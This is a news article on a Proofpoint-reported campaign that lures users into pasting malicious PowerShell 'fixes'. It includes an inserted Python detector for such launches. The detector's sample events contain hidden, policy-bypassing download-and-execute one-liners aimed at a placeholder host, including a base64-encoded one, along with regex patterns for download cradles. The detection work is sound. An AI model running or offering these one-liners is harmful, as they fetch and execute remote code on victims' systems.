Hackers Exploit Copy-Paste Tactics To Deploy Malicious PowerShell Scripts, Research Found

Chrome malware popup

Malware consists only of computer code, and code is harmless until it is executed.

That is why hackers have devised a new, deceptive method to trick users into installing malware themselves. The scheme lures users with fake solutions to common errors in popular services such as Google Chrome, Microsoft Word and Microsoft OneDrive.

Once users are tricked into downloading and executing these "fixes" by clicking the Copy fix button, they unwittingly run a PowerShell command or a Windows Run dialog command that can compromise their systems.

The campaign delivers these error messages to unsuspecting users through emails as well as website overlays.

These messages are used to trick users into downloading fake browser updates, which are then used to install malware onto a user’s device.

The malware spreads through clever social engineering techniques, said researchers from cybersecurity firm Proofpoint, who discovered the campaign, in a blog post.

The researchers found three attack chains being used to spread the malware.

The first method involves showing users a warning saying there is a problem displaying a webpage. The warning prompts the user to install a "root certificate" by copying a PowerShell script to the Windows clipboard and then running it in a Windows admin console. The script displays decoy messages while it downloads and installs an info-stealer onto the device.

The second method also uses compromised websites, but with overlays that imitate Google Chrome error messages.

The third method involves the attackers sending an email that resembles a Microsoft Word document prompt, asking users to download what looks like a "Word Online" extension to view the document correctly. The error message also offers "How to fix" and "Auto-fix" options, which contain commands to be copied to the clipboard and pasted into PowerShell to resolve the error.

While the campaign depends on a lack of user awareness to deliver its malware, the inability of Windows to detect and block the malicious actions has further exacerbated the problem.

According to the Proofpoint researchers, the payloads include Matanbuchus, DarkGate, NetSupport, XMRig, Amadey Loader, a clipboard hijacker, and Lumma Stealer.

These campaigns are run by multiple threat actors, including those behind ClearFake, a new activity cluster called ClickFix, and the threat actor TA571, known as a spam distributor that sends large volumes of email leading to malware and ransomware infections.

A malware infection can be devastating. But defending against these campaigns should be relatively easy, since there are plenty of precautions users can take to avoid falling victim to this type of sneaky attack.

First and foremost, users should always be careful with the attachments they download, even from a trustworthy source. And in this case, remember never to copy and paste code offered by such a prompt.

Products from large, reputable companies like Google and Microsoft will never ask their general users to fiddle with code, ever.

So unless users are developers or programmers, tech companies will not ask them to debug or do anything outside what is normal.

Second, properly updated antivirus and antimalware software should also come in handy.

Dealing with PowerShell scripts is not for the faint of heart.

Even as plain text, PowerShell scripts pose a unique risk compared to other kinds of plain-text code: they are executed directly by the PowerShell interpreter, which makes them readily executable without any compilation.

Users can run these scripts simply by pasting them into a PowerShell console or running them as a script file, and that is what makes the campaign dangerous.
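On the detection side, the following Python is an added example written for this article (not Proofpoint's code and not part of the original post): it scans constructed process-creation events for the pattern the campaign relies on, a PowerShell process launched from the Run dialog or desktop (parent explorer.exe) with a hidden window, an encoded command or a download-and-execute cradle, decoding -EncodedCommand payloads so they are scanned too. The event field names, file paths, domain and command lines are assumptions.

```python
import base64
import re

# A command pasted into the Run dialog is spawned by explorer.exe; scheduled or
# scripted PowerShell launches normally have a different parent process.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a pasted download-and-run one-liner.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download_cradle", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    # Recover the UTF-16LE script behind -EncodedCommand so it is scanned as well.
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:  # bad base64 or bad UTF-16: treat as not encoded
        return ""

def analyze_event(event):
    """Return the indicator names hit by one process-creation event ([] if benign)."""
    if basename(event["parent"]) not in INTERACTIVE_PARENTS or basename(event["image"]) not in SHELL_IMAGES:
        return []
    text = event["cmdline"] + " " + decode_encoded_command(event["cmdline"])
    return [name for name, rx in INDICATORS if rx.search(text)]

def find_suspicious(events):
    # Map event index -> indicators for every event that looks like a pasted "fix".
    return {i: hits for i, e in enumerate(events) if (hits := analyze_event(e))}

# Constructed sample events in Sysmon Event ID 1 style; paths, domain and command lines are illustrative.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("IEX (IWR https://example.invalid/stage2)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -NoProfile -enc " + ENCODED},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -NoExit -Command Get-Date"},  # benign interactive use, must not fire
]
```

Run against real Sysmon or EDR process-creation telemetry, the same three checks (interactive parent, shell image, cradle-style arguments) are what separates a pasted "fix" from routine administrative PowerShell.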

"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," warns a report from Proofpoint.

The different attack chains show that hackers are actively experimenting with multiple methods to improve effectiveness and find more infection pathways to compromise a larger number of systems.

Published: 19/06/2024